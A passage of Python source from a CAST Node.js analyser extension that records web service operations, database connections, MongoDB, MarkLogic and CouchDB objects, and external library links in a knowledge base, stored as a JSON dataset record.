sails_app.function_sql\n parsingResults.is_node_project = True\n\n if not parsingResults.is_node_project and self.node_project_path and '\\\\client\\\\' not in self.currentFilename:\n parsingResults.is_node_project = self.node_project_path in self.currentFilename\n\n parsingResults.LoopbackServer = self.loopback_analysis.server\n\n try:\n analyse(jsContent, self.config, self.loopback_analysis, parsingResults, self.currentFile, versions)\n except:\n pass\n \n '''\n * Create model.\n * Sails save model infos, service infos...\n ''' \n \n if sails_app:\n for model in sails_app.list_models:\n name_model = '\\\\api\\\\models\\\\' + model + '.js'\n if name_model in self.currentFilename and model not in sails_app.model_objects.keys():\n sails_app.model_objects[model] = jsContent\n \n for service in parsingResults.service_sails:\n service.parent = jsContent.kbObject\n sails_app.append_services(service)\n\n sails_app.extend_model_infos(parsingResults.model_infos, jsContent.get_kb_object())\n sails_app.extend_actions(parsingResults.action_sails)\n\n if '\\\\api\\\\controllers' in self.currentFilename:\n sails_app.append_controllers(jsContent)\n \n if self.currentFilename.endswith('app.js'):\n sail_src = self.currentFilename.replace('app.js', '.sailsrc')\n if os.path.exists(sail_src):\n kb = self.create_application(jsContent)\n sails_app.set_kb(kb)\n \n if not sails_app.database_sails and parsingResults.database_sails:\n sails_app.database_sails = parsingResults.database_sails\n \n '''\n * express, hapi, loopback\n '''\n if parsingResults.isApplication:\n self.create_application(jsContent)\n if parsingResults.LoopbackServer and not self.loopback_analysis.server:\n self.create_loopback_server(jsContent)\n self.loopback_analysis.server = True\n for loopbackRemoteMethod in parsingResults.loopbackRemoteMethods:\n self.loopback_analysis.create_loopback_operation(loopbackRemoteMethod[0], loopbackRemoteMethod[1], loopbackRemoteMethod[2], loopbackRemoteMethod[3], jsContent.get_kb_object(), self.currentFile, loopbackRemoteMethod[4], loopbackRemoteMethod[5], loopbackRemoteMethod[6])\n for linkSuspension in parsingResults.linkSuspensions:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, linkSuspension.callee, linkSuspension.callPart.create_bookmark(self.currentFile))\n\n for name, ast in parsingResults.externalLibraries.items():\n self.create_external_library(name, ast, \\\n parsingResults.externalLibrariesFunctionCalls[name] if name in parsingResults.externalLibrariesFunctionCalls else [], \\\n parsingResults.externalLibrariesMethodCalls[name] if name in parsingResults.externalLibrariesMethodCalls else [])\n \n if parsingResults.potentialExpressControllerClasses:\n for cl in parsingResults.potentialExpressControllerClasses:\n self.potentialExpressControllers[cl] = PotentialController(cl, jsContent.get_file()) \n if parsingResults.potentialExpressControllerRoutesFCall:\n self.potentialExpressControllerRoutesFCall.extend(parsingResults.potentialExpressControllerRoutesFCall)\n \n for service in parsingResults.services:\n filename = self.currentFile.get_path()\n if filename in self.servicesByFilename:\n l = self.servicesByFilename[filename]\n else:\n l = []\n self.servicesByFilename[filename] = l\n service.sourceCode = self.currentSourceCode\n l.append(service)\n for dbConnection in parsingResults.dbConnections:\n self.create_database_accesses(dbConnection)\n for httpRequest in parsingResults.httpRequests:\n self.create_http_request(httpRequest)\n \n if parsingResults.couchdbDatabases or parsingResults.marklogicDatabases or parsingResults.mongooseConnections or parsingResults.mongooseModels:\n self.parsingResultsToKeepByJSContent[jsContent] = parsingResults\n \n parsingResults.violations.save()\n\n # Save all infos\n\n # knex save info:\n self.knex_support.set_infos(parsingResults)\n\n # mqtt save infos\n self.mqtt.set_infos(parsingResults)\n\n # seneca save infos\n self.seneca.set_infos(parsingResults, jsContent)\n\n @Event('com.castsoftware.html5', 'end_javascript_contents')\n def end_javascript_contents(self):\n \n guids = {}\n couchDBByName = {}\n\n mongooseModelsByIdentifier = {}\n \n for _, parsingResults in self.parsingResultsToKeepByJSContent.items():\n for mongooseModel in parsingResults.mongooseModels:\n if mongooseModel.variableIdentifier:\n mongooseModelsByIdentifier[mongooseModel.variableIdentifier] = mongooseModel\n \n for jsContent, parsingResults in self.parsingResultsToKeepByJSContent.items():\n \n for marklogicDatabase in parsingResults.marklogicDatabases:\n try:\n self.create_marklogic_database(marklogicDatabase, jsContent, guids)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n \n for mongooseConnection in parsingResults.mongooseConnections:\n try:\n self.create_mongoose_connection(mongooseConnection, jsContent)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n for mongooseModel in parsingResults.mongooseModels:\n try:\n self.create_mongoose_model(mongooseModel, jsContent, mongooseModelsByIdentifier, guids)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n for couchdbDatabase in parsingResults.couchdbDatabases:\n try:\n self.create_couchdb_database(couchdbDatabase, jsContent, guids, couchDBByName)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n for couchdbCall in parsingResults.couchdbCalls:\n try:\n self.create_couchdb_call(couchdbCall, couchDBByName, jsContent)\n except:\n log.debug('Internal issue when creating create_marklogic_database: ' + str(traceback.format_exc()))\n\n guids = {} # contains guids as key and number as value to avoid duplicated guids\n for file_name, services in self.servicesByFilename.items():\n for service in services:\n if service.routerReference:\n serviceDirname = os.path.dirname(service.sourceCode.parent.get_path())\n# routerDirname = os.path.abspath(os.path.join(serviceDirname, service.routerReference) + '.js')\n if isinstance(service.routerReference, str):\n routerDirname = os.path.abspath(os.path.join(serviceDirname, service.routerReference) + '.js')\n else:\n try:\n routerDirname = service.routerReference.get_file().get_path()\n except:\n routerDirname = ''\n if routerDirname in self.servicesByFilename:\n routerServices = self.servicesByFilename[routerDirname]\n for routerService in routerServices:\n if routerService.isRouter:\n self.create_operation(routerService, guids, service.get_uri_evaluation())\n else:\n self.create_operation(service, guids)\n\n elif service.koa_router:\n if service.koa_use:\n def uri_real(router_info, url):\n try:\n router = router_info.get_resolutions()[0].callee\n\n if not router.is_identifier():\n\n return False\n\n while not router.is_js_content():\n router = router.parent\n \n routerDirname = router.get_file().get_path()\n\n if routerDirname not in self.servicesByFilename.keys():\n return False\n routerServices = self.servicesByFilename[routerDirname]\n \n if file_name == routerDirname:\n for routerService in routerServices:\n log.debug('final -----' + (url))\n self.create_operation(routerService, guids, url)\n return\n \n for routerService in routerServices:\n old_url = url\n if routerService.koa_router and not routerService.isRouter:\n url = url + routerService.get_uri_evaluation()\n if not uri_real(routerService.koa_router, url):\n url = old_url\n \n elif routerService.koa_router and routerService.isRouter:\n self.create_operation(routerService, guids, url)\n\n url = old_url\n\n return True\n\n except:\n return False\n\n uri_real(service.koa_router, '')\n\n elif not service.isRouter:\n self.create_operation(service, guids)\n \n self.create_express_controllers()\n \n self.sails_apps.compute()\n self.knex_support.compute()\n self.mqtt.compute()\n self.seneca.compute()\n\n self.nbOperations = self.nbOperations + self.loopback_analysis.nbOperations_loop_back\n\n log.info(str(self.nbApplications) + ' NodeJS applications created.')\n log.info(str(self.nbOperations) + ' NodeJS web service operations created.')\n log.info(str(self.nbMongooseModels) + ' NodeJS mongoose models created.')\n log.info(str(self.nbDbAccesses) + ' NodeJS database accesses found.')\n log.info(str(self.nbMarklogicDatabases) + ' NodeJS marklogic databases created.')\n log.info(str(self.nbMarklogicCollections) + ' NodeJS marklogic collections created.')\n log.info(str(self.nbCouchDBDatabases) + ' NodeJS CouchDB databases created.')\n log.info(str(self.loopback_analysis.nbLoopbackModels) + ' NodeJS loopback models created.')\n \n def create_express_controllers(self):\n guids = {}\n for potentialExpressControllerRoutesFCall in self.potentialExpressControllerRoutesFCall:\n parentClass = potentialExpressControllerRoutesFCall.ast.parent\n while parentClass and hasattr(parentClass, 'is_class') and not parentClass.is_class():\n parentClass = parentClass.parent\n if parentClass:\n if parentClass in self.potentialExpressControllers:\n ctrl = self.potentialExpressControllers[parentClass]\n if not ctrl.kbObject:\n self.create_express_controller(ctrl)\n potentialExpressControllerRoutesFCall.sourceCode = parentClass.parent\n self.create_operation(potentialExpressControllerRoutesFCall, guids, None, ctrl.kbObject)\n\n def create_express_controller(self, ctrl):\n \n ctrl_object = cast.analysers.CustomObject()\n ctrl.kbObject = ctrl_object\n ctrl_object.set_name(ctrl.cl.get_name())\n ctrl_object.set_parent(ctrl.cl.get_kb_object())\n fullname = ctrl.cl.get_kb_object().guid + '/EXPRESS_CTRL'\n displayfullname = ctrl.cl.get_kb_object().fullname + '/EXPRESS_CTRL'\n ctrl_object.set_fullname(displayfullname)\n ctrl_object.set_guid(fullname)\n ctrl_object.set_type('CAST_NodeJS_Express_Controller')\n ctrl_object.save()\n ctrl_object.save_position(ctrl.cl.create_bookmark(ctrl.file))\n \n def normalize_path(self, operationPath):\n\n service_names = operationPath.split('/')\n service_name = None\n if service_names:\n service_name = ''\n for part in service_names:\n if part: \n if part.startswith('{') or part.startswith(':'):\n service_name += '{}/'\n else:\n service_name += ( part + '/' )\n return service_name\n\n def create_single_operation(self, service, guids, routedUrl, operationName, localGuids, parentKbObject = None):\n\n operationType = service.type\n handler = service.handler\n ast = service.ast\n \n try:\n routedUrl = routedUrl.replace('****', '')\n except:\n pass\n if routedUrl:\n if operationName.startswith('/'):\n operationName = routedUrl + operationName[1:]\n else:\n operationName = routedUrl + operationName\n\n if not operationName:\n operationName = '/'\n \n name = operationName.replace('****', '')\n if name == '/':\n if parentKbObject:\n fullname = parentKbObject.guid + '/' + operationType + '/'\n displayfullname = parentKbObject.fullname + '.' + operationType + '.'\n else:\n fullname = service.sourceCode.guid + '/' + operationType + '/'\n displayfullname = service.sourceCode.fullname + '.' + operationType + '.'\n else:\n if parentKbObject:\n fullname = parentKbObject.guid + '/' + operationType + '/' + name\n displayfullname = parentKbObject.fullname + '.' + operationType + '.' + name\n else:\n fullname = service.sourceCode.guid + '/' + operationType + '/' + name\n displayfullname = service.sourceCode.fullname + '.' + operationType + '.' + name\n \n if not localGuids or not fullname in localGuids:\n\n if fullname in guids:\n nr = guids[fullname]\n guids[fullname] = nr + 1\n fullname += ('_' + str(nr + 1))\n try:\n service.sourceCode.save_violation('CAST_NodeJS_Metric_MultipleRoutesForSamePath.numberOfMultipleRoutesForSamePath', ast.create_bookmark(service.sourceCode.parent))\n except:\n pass\n else:\n guids[fullname] = 0\n if service.inLoop and not '****' in operationName:\n try:\n service.sourceCode.save_violation('CAST_NodeJS_Metric_MultipleRoutesForSamePath.numberOfMultipleRoutesForSamePath', ast.create_bookmark(service.sourceCode.parent))\n except:\n pass\n\n operation_object = cast.analysers.CustomObject()\n operation_object.set_name(name)\n if parentKbObject:\n operation_object.set_parent(parentKbObject)\n else:\n operation_object.set_parent(service.sourceCode)\n operation_object.set_fullname(displayfullname)\n operation_object.set_guid(fullname)\n if localGuids != None:\n localGuids.append(fullname)\n \n linkType = 'fireLink'\n if operationType == 'delete':\n linkType = 'fireDeleteLink'\n operation_object.set_type('CAST_NodeJS_DeleteOperation')\n elif operationType == 'put':\n linkType = 'fireUpdateLink'\n operation_object.set_type('CAST_NodeJS_PutOperation')\n elif operationType == 'post':\n linkType = 'fireUpdateLink'\n operation_object.set_type('CAST_NodeJS_PostOperation')\n elif operationType == 'use':\n linkType = 'fireLink'\n operation_object.set_type('CAST_NodeJS_UseOperation')\n else:\n linkType = 'fireSelectLink'\n operation_object.set_type('CAST_NodeJS_GetOperation')\n operation_object.save()\n operation_object.save_position(ast.create_bookmark(service.sourceCode.parent))\n operation_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n log.debug('create_operation ' + fullname)\n\n self.nbOperations += 1\n\n if not handler:\n return\n\n if handler.get_kb_symbol():\n create_link_nodeJS(linkType, operation_object, handler.kbObject, handler.create_bookmark(service.sourceCode.parent))\n elif handler.get_resolutions():\n for resolution in handler.resolutions:\n if resolution.callee and resolution.callee.get_kb_object():\n create_link_nodeJS(linkType, operation_object, resolution.callee.get_kb_object(), handler.create_bookmark(service.sourceCode.parent))\n\n def create_operation(self, service, guids, routedUrl = None, parentKbObject = None):\n\n operationName = service.get_uri_evaluation()\n if type(operationName) is list:\n localGuids = []\n for opName in operationName:\n if type(routedUrl) is list:\n for routed in routedUrl:\n self.create_single_operation(service, guids, routed, opName, localGuids, parentKbObject)\n else:\n self.create_single_operation(service, guids, routedUrl, opName, localGuids, parentKbObject)\n else:\n if type(routedUrl) is list:\n for routed in routedUrl:\n self.create_single_operation(service, guids, routed, operationName, None, parentKbObject)\n else:\n self.create_single_operation(service, guids, routedUrl, operationName, None, parentKbObject)\n\n def create_mongoose_connection(self, mongooseConnection, jsContent):\n \n evs = self.evaluate_nosql_name(mongooseConnection.url)\n# if not evs:\n# ident = None\n# try:\n# if mongooseConnection.url.resolutions:\n# ident = mongooseConnection.url.resolutions[0].callee\n# except:\n# pass\n# if not ident:\n# ident = mongooseConnection.url\n# if ident and ident.is_identifier():\n# evs.append(ident.get_name())\n \n for url in evs:\n\n if mongooseConnection.name:\n url = mongooseConnection.name + '/' + url\n \n if url in self.mongooseConnectionsByName:\n continue\n \n self.mongooseConnectionsByName[url] = mongooseConnection\n self.mongooseConnectionsByAst[mongooseConnection.ast] = mongooseConnection\n \n ast = mongooseConnection.ast\n \n mongooseConnection_object = cast.analysers.CustomObject()\n mongooseConnection.kb_symbol = mongooseConnection_object\n \n mongooseConnection_object.set_name(url)\n mongooseConnection_object.set_parent(jsContent.get_kb_object())\n fullname = jsContent.file.get_path() + '/CAST_NodeJS_MongoDB_Connection/' + url\n displayfullname = jsContent.file.get_path() + '.CAST_NodeJS_MongoDB_Connection.' + url\n mongooseConnection.fullname = fullname\n mongooseConnection_object.set_fullname(displayfullname)\n mongooseConnection_object.set_guid(fullname)\n mongooseConnection_object.set_type('CAST_NodeJS_MongoDB_Connection')\n mongooseConnection_object.save()\n mongooseConnection_object.save_position(ast.create_bookmark(jsContent.file))\n mongooseConnection_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n log.debug('create_mongodb_connection ' + fullname)\n\n def evaluate_nosql_name(self, identName):\n \n evs = identName.evaluate()\n\n if not evs:\n callee = None\n try:\n if identName.resolutions:\n callee = identName.resolutions[0].callee\n except:\n pass\n if not callee:\n callee = identName\n if callee and callee.is_identifier():\n \"\"\"\n var config = { collection: 'myCollection' }\n var collectionName = config.collection\n \n If config.collection is resolved to config, then we keep config as name for collection, and not config.\n \"\"\"\n try:\n identFullname = identName.get_fullname()\n if '.' in identFullname and identFullname.startswith(callee.get_name()):\n evs.append(identName.get_name())\n else:\n evs.append(callee.get_name())\n except:\n evs.append(callee.get_name())\n return evs\n \n def create_mongoose_model(self, mongooseModel, jsContent, mongooseModelsByIdentifier, guids):\n\n def get_model_by_name(name):\n for model in mongooseModelsByIdentifier.values():\n if model.name.get_text() == name.get_text():\n return model\n return None\n\n caller_id = mongooseModel.callerIdentifier\n if caller_id:\n realMongooseModel = None\n try:\n if caller_id in mongooseModelsByIdentifier:\n realMongooseModel = mongooseModelsByIdentifier[caller_id]\n \n elif caller_id.is_function_call():\n callpart = caller_id.get_function_call_parts()[0]\n \n if not callpart.get_name() == 'model':\n return\n \n name_model = callpart.get_parameters()[0]\n realMongooseModel = get_model_by_name(name_model)\n \n except:\n log.warning('can not resolve identifier caller')\n return\n\n if not realMongooseModel:\n return\n\n if not realMongooseModel.kb_symbol:\n self.create_mongoose_model(realMongooseModel, realMongooseModel.jsContent, mongooseModelsByIdentifier, guids)\n\n if not realMongooseModel.kb_symbol:\n return\n\n for linkSuspension in mongooseModel.linkSuspensions:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, realMongooseModel.kb_symbol, linkSuspension.callPart.create_bookmark(jsContent.file))\n return\n \n if mongooseModel.kb_symbol:\n return\n \n if mongooseModel.fcallpartConnection in self.mongooseConnectionsByAst:\n parent = self.mongooseConnectionsByAst[mongooseModel.fcallpartConnection].get_kb_object()\n# fullnamePrefix = self.mongooseConnectionsByAst[mongooseModel.fcallpartConnection].fullname\n else:\n parent = jsContent.get_kb_object()\n fullnamePrefix = jsContent.file.get_path() + '/CAST_NodeJS_MongoDB_Collection'\n displayfullnamePrefix = jsContent.file.get_path() + '.CAST_NodeJS_MongoDB_Collection'\n\n if mongooseModel.name:\n evs = self.evaluate_nosql_name(mongooseModel.name)\n else:\n evs = []\n \n for name in evs:\n\n if mongooseModel.fcallpartConnection in self.mongooseModelsByConnectionByName and name in self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection]:\n \n modelReference = self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection][name]\n\n else:\n \n modelReference = mongooseModel\n if mongooseModel.fcallpartConnection in self.mongooseModelsByConnectionByName:\n l = self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection]\n else:\n l = {}\n self.mongooseModelsByConnectionByName[mongooseModel.fcallpartConnection] = l\n l[name] = mongooseModel\n \n ast = mongooseModel.ast\n \n mongooseModel_object = cast.analysers.CustomObject()\n mongooseModel.kb_symbol = mongooseModel_object\n \n mongooseModel_object.set_name(name)\n mongooseModel_object.set_parent(parent)\n fullname = fullnamePrefix + '/' + name\n displayfullname = displayfullnamePrefix + '.' + name\n\n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n mongooseModel_object.set_fullname(displayfullname)\n mongooseModel_object.set_guid(fullname)\n mongooseModel_object.set_type('CAST_NodeJS_MongoDB_Collection')\n mongooseModel_object.save()\n mongooseModel_object.save_position(ast.create_bookmark(jsContent.file))\n mongooseModel_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n log.debug('create_mongodb_model ' + fullname)\n self.nbMongooseModels += 1\n \n for linkSuspension in mongooseModel.linkSuspensions:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, modelReference.kb_symbol, linkSuspension.callPart.create_bookmark(jsContent.file))\n \n def create_marklogic_database(self, marklogicDatabase, jsContent, guids):\n \n if marklogicDatabase.connectionParameter in self.marklogicDatabasesByConnectionParameter:\n db = self.marklogicDatabasesByConnectionParameter[marklogicDatabase.connectionParameter]\n marklogicDatabase_object = db.kb_symbol\n marklogicDatabase.referencedDatabase = db\n marklogicDatabase.kb_symbol = marklogicDatabase_object\n else:\n self.marklogicDatabasesByConnectionParameter[marklogicDatabase.connectionParameter] = marklogicDatabase\n marklogicDatabase_object = None\n \n ast = marklogicDatabase.connectionParameter\n \n if not marklogicDatabase_object:\n\n marklogicDatabase_object = cast.analysers.CustomObject()\n marklogicDatabase.kb_symbol = marklogicDatabase_object\n \n marklogicDatabase_object.set_name(marklogicDatabase.name)\n marklogicDatabase_object.set_parent(jsContent.get_kb_object())\n fullname = ast.get_file().get_path() + '/CAST_NodeJS_Marklogic_Database/' + marklogicDatabase.name\n displayfullname = ast.get_file().get_path() + '.CAST_NodeJS_Marklogic_Database.' + marklogicDatabase.name\n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n log.info('create marklogic database ' + fullname)\n \n marklogicDatabase_object.set_fullname(displayfullname)\n marklogicDatabase_object.set_guid(fullname)\n marklogicDatabase_object.set_type('CAST_NodeJS_Marklogic_Database')\n marklogicDatabase_object.save()\n marklogicDatabase_object.save_position(ast.create_bookmark(marklogicDatabase.connectionParameter.get_file()))\n marklogicDatabase_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n self.nbMarklogicDatabases += 1\n \n collections = {}\n \n for collection in marklogicDatabase.collections.keys():\n kbObject = self.create_marklogic_collection(collection, marklogicDatabase, jsContent, guids)\n collections[collection] = kbObject\n\n for suspLink in marklogicDatabase.linksToCollections:\n try:\n if suspLink.callee:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, collections[suspLink.callee], suspLink.callPart.create_bookmark(jsContent.file))\n else:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, marklogicDatabase_object, suspLink.callPart.create_bookmark(jsContent.file))\n except:\n pass\n\n def create_marklogic_collection(self, param, marklogicDatabase, jsContent, guids):\n \n evs = self.evaluate_nosql_name(param)\n\n if evs:\n for n in evs:\n \n if n.startswith('/'):\n name = n[1:]\n else:\n name = n\n\n if marklogicDatabase.referencedDatabase and name in marklogicDatabase.referencedDatabase.collectionsByName:\n return marklogicDatabase.referencedDatabase.collectionsByName[name]\n if name in marklogicDatabase.collectionsByName:\n return marklogicDatabase.collectionsByName[name]\n \n marklogicCollection_object = cast.analysers.CustomObject()\n if marklogicDatabase.referencedDatabase:\n marklogicDatabase.referencedDatabase.add_collection_by_name(name, marklogicCollection_object)\n else:\n marklogicDatabase.add_collection_by_name(name, marklogicCollection_object)\n \n marklogicCollection_object.set_name(name)\n marklogicCollection_object.set_parent(marklogicDatabase.kb_symbol)\n# fullname = marklogicDatabase.kb_symbol.fullname + '/' + name\n fullname = jsContent.file.get_path() + '/CAST_NodeJS_Marklogic_Collection/' + name\n displayfullname = jsContent.file.get_path() + '.CAST_NodeJS_Marklogic_Collection.' + name\n \n log.info('create marklogic collection ' + fullname)\n \n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n marklogicCollection_object.set_fullname(displayfullname)\n marklogicCollection_object.set_guid(fullname)\n marklogicCollection_object.set_type('CAST_NodeJS_Marklogic_Collection')\n marklogicCollection_object.save()\n try:\n marklogicCollection_object.save_position(marklogicDatabase.collections[param].create_bookmark(jsContent.file))\n except:\n pass\n marklogicDatabase.set_collection_kb_object(param, marklogicCollection_object)\n \n self.nbMarklogicCollections += 1\n \n return marklogicCollection_object\n\n def create_couchdb_database(self, couchdbDatabase, jsContent, guids, couchDBByName):\n \n names = self.evaluate_nosql_name(couchdbDatabase.name)\n for name in names:\n \n if name in couchDBByName:\n for suspLink in couchdbDatabase.linksToDatabase:\n try:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, couchdbDatabase.kb_symbol, suspLink.callPart.create_bookmark(jsContent.file))\n except:\n pass\n continue\n \n couchDBByName[name] = couchdbDatabase\n \n ast = couchdbDatabase.ast\n \n couchdbDatabase_object = cast.analysers.CustomObject()\n couchdbDatabase.kb_symbol = couchdbDatabase_object\n \n couchdbDatabase_object.set_name(name)\n couchdbDatabase_object.set_parent(jsContent.get_kb_object())\n fullname = jsContent.file.get_path() + '/CAST_NodeJS_CouchDB_Database/' + name\n displayfullname = jsContent.file.get_path() + '.CAST_NodeJS_CouchDB_Database.' + name\n if not fullname in guids:\n guids[fullname] = 1\n else:\n guids[fullname] = guids[fullname] + 1\n fullname += ('_' + str(guids[fullname]))\n \n log.info('create CouchDB database ' + fullname)\n \n couchdbDatabase_object.set_fullname(displayfullname)\n couchdbDatabase_object.set_guid(fullname)\n couchdbDatabase_object.set_type('CAST_NodeJS_CouchDB_Database')\n couchdbDatabase_object.save()\n couchdbDatabase_object.save_position(ast.create_bookmark(jsContent.file))\n couchdbDatabase_object.save_property('checksum.CodeOnlyChecksum', ast.get_code_only_crc())\n \n self.nbCouchDBDatabases += 1\n \n for suspLink in couchdbDatabase.linksToDatabase:\n try:\n create_link_nodeJS(suspLink.linkType, suspLink.caller, couchdbDatabase_object, suspLink.callPart.create_bookmark(jsContent.file))\n except:\n pass\n\n def create_couchdb_call(self, couchdbCall, couchDBDatabasesByName, jsContent):\n \n dbNames = couchdbCall.variableName.evaluate()\n if dbNames:\n for name in dbNames:\n if name in couchDBDatabasesByName:\n db = couchDBDatabasesByName[name]\n try:\n create_link_nodeJS(couchdbCall.linkType, couchdbCall.caller, db.kb_symbol, couchdbCall.ast.create_bookmark(jsContent.file))\n except:\n pass\n \n def create_database_accesses(self, dbConnection):\n\n for linkSuspension in dbConnection.linkSuspensions:\n callee = linkSuspension.callee\n if isinstance(callee, str):\n calleeName = callee.upper()\n if calleeName in self.unknownTablesByName:\n callee = self.unknownTablesByName[calleeName]\n else:\n callee = cast.analysers.CustomObject()\n self.unknownTablesByName[calleeName] = callee\n callee.set_name(calleeName)\n# Due to a bug in the framework, we can not create an object whose parent is a project anymore\n# callee.set_parent(self.currentFile.get_project())\n callee.set_parent(self.currentFile)\n fullname = self.currentFile.get_project().get_fullname() + '/CAST_NodeJS_Unknown_Database_Table/' + calleeName\n displayfullname = self.currentFile.get_project().get_fullname() + '.CAST_NodeJS_Unknown_Database_Table.' + calleeName\n callee.set_fullname(displayfullname)\n callee.set_guid(fullname)\n callee.set_type('CAST_NodeJS_Unknown_Database_Table')\n callee.save()\n create_link('parentLink', callee, self.currentFile.get_project())\n \n log.debug('create_unresolved table ' + calleeName)\n if callee:\n self.nbDbAccesses += 1\n if linkSuspension.caller:\n create_link_nodeJS(linkSuspension.linkType, linkSuspension.caller, callee, linkSuspension.callPart.create_bookmark(self.currentFile))\n else:\n create_link_nodeJS(linkSuspension.linkType, self.currentSourceCode, callee, linkSuspension.callPart.create_bookmark(self.currentFile))\n\n# self.type = type\n# self.uri = uri\n# self.handler = handler\n# self.ast = ast\n# self.kbObject = None\n def create_http_request(self, httpRequest, uri = None):\n \n if uri == None:\n uris = httpRequest.get_uri_evaluation()\n if type(uris) is list:\n for uri in uris:\n self.create_http_request(httpRequest, uri)\n return\n _uri = uris\n else:\n _uri = uri\n\n if httpRequest.type == 'GET':\n objectType = 'CAST_NodeJS_GetHttpRequestService'\n elif httpRequest.type == 'POST':\n objectType = 'CAST_NodeJS_PostHttpRequestService'\n elif httpRequest.type == 'PUT':\n objectType = 'CAST_NodeJS_PutHttpRequestService'\n elif httpRequest.type == 'DELETE':\n objectType = 'CAST_NodeJS_DeleteHttpRequestService'\n else:\n objectType = 'CAST_NodeJS_GetHttpRequestService'\n \n obj = cast.analysers.CustomObject()\n name = get_short_uri(_uri)\n obj.set_name(name)\n obj.set_type(objectType)\n obj.set_parent(self.currentSourceCode)\n fullname = httpRequest.caller.get_kb_symbol().get_kb_fullname() + '/' + objectType + '/' + name\n displayfullname = httpRequest.caller.get_kb_symbol().get_display_fullname() + '.' + httpRequest.type.lower() + '.' + name\n n = 0\n if fullname in self.httpRequestGuids:\n n = self.httpRequestGuids[fullname] + 1\n finalFullname = fullname + '_' + str(n)\n else:\n finalFullname = fullname\n self.httpRequestGuids[fullname] = n\n obj.set_guid(finalFullname)\n obj.set_fullname(displayfullname)\n obj.save()\n obj.save_property('CAST_ResourceService.uri', _uri)\n crc = httpRequest.ast.tokens[0].get_code_only_crc()\n obj.save_property('checksum.CodeOnlyChecksum', crc)\n obj.save_position(httpRequest.ast.create_bookmark(self.currentFile))\n \n create_link_nodeJS('callLink', httpRequest.caller, obj)\n \n if httpRequest.handler:\n create_link_nodeJS('callLink', obj, httpRequest.handler.get_kb_object())\n \n for onFunction in httpRequest.onFunctions:\n create_link_nodeJS('callLink', obj, onFunction.get_kb_object())\n \n def create_application(self, jsContent):\n\n log.info('NodejS application found ' + self.currentFile.get_path())\n self.nbApplications += 1\n \n app = cast.analysers.CustomObject()\n name = self.currentSourceCode.name[:-3]\n app.set_name(name)\n app.set_type('CAST_NodeJS_Application')\n app.set_parent(self.currentFile)\n fullname = self.currentFile.get_path() + '/CAST_NodeJS_Application'\n displayfullname = self.currentFile.get_path() + '.CAST_NodeJS_Application'\n app.set_guid(fullname)\n app.set_fullname(displayfullname)\n app.save()\n crc = jsContent.objectDatabaseProperties.checksum\n app.save_property('checksum.CodeOnlyChecksum', crc)\n app.save_position(jsContent.create_bookmark(self.currentFile))\n \n create_link_nodeJS('relyonLink', app, self.currentSourceCode)\n \n return app\n\n def create_loopback_server(self, jsContent):\n\n dirname = os.path.dirname(self.currentFile.get_path())\n\n log.info('NodejS loopback server found ' + self.currentFile.get_path())\n app = self.create_application(jsContent)\n\n if dirname in self.loopback_analysis.loopbackApplications:\n appli = self.loopback_analysis.loopbackApplications[dirname]\n appli.kbObject = app\n for model in appli.models.values():\n if 'kbObject' in model:\n create_link_nodeJS('referLink', appli, model['kbObject'])\n \n else:\n log.warning('model found in model-config is not defined: ' + str(model['name']))\n \n def create_external_library(self, name, ast, externalLibrariesFunctionCalls=[], externalLibrariesMethodCalls=[]):\n \n parentFullname = 'NodeJS.externalLibrary'\n if not self.externalLibrariesParent:\n self.externalLibrariesParent = cast.analysers.CustomObject()\n self.externalLibrariesParent.set_name('NodeJS Standard library')\n self.externalLibrariesParent.set_type('CAST_NodeJS_External_Library')\n self.externalLibrariesParent.set_parent(self.currentFile.get_project())\n self.externalLibrariesParent.set_guid(parentFullname)\n self.externalLibrariesParent.set_external()\n self.externalLibrariesParent.set_fullname(parentFullname)\n self.externalLibrariesParent.save()\n \n if name in self.externalLibraries:\n extLib = self.externalLibraries[name]\n obj = extLib.kbObject\n else:\n extLib = ExternalLibrary(name)\n extLib.create_objects(self.externalLibrariesParent, parentFullname)\n self.externalLibraries[name] = extLib\n obj = extLib.kbObject\n create_link_nodeJS('useLink', self.currentSourceCode, obj, ast.create_bookmark(self.currentFile))\n \n for linkSusp in externalLibrariesFunctionCalls:\n func = extLib.get_kb_function(linkSusp.callPart.get_identifier().get_name())\n if func:\n create_link_nodeJS('callLink', linkSusp.caller, func, linkSusp.callPart.create_bookmark(self.currentFile))\n \n for linkSusp in externalLibrariesMethodCalls:\n createClassMethod = linkSusp.infos['createClassMethod']\n try:\n className = ExternalLibrary.functionReturnsClassByLibName[extLib.name][createClassMethod]\n meth = extLib.get_kb_method(className, linkSusp.callPart.get_identifier().get_name())\n if meth:\n create_link_nodeJS('callLink', linkSusp.caller, meth, linkSusp.callPart.create_bookmark(self.currentFile))\n except:\n log.debug('Internal issue when creating link to external method: ' + str(traceback.format_exc()))\n \n \n","sub_path":"analyze/extensions/com.castsoftware.nodejs.2.0.2-funcrel/analyser.py","file_name":"analyser.py","file_ext":"py","file_size_in_byte":53357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503900222","text":"import torch\nimport torch.optim as 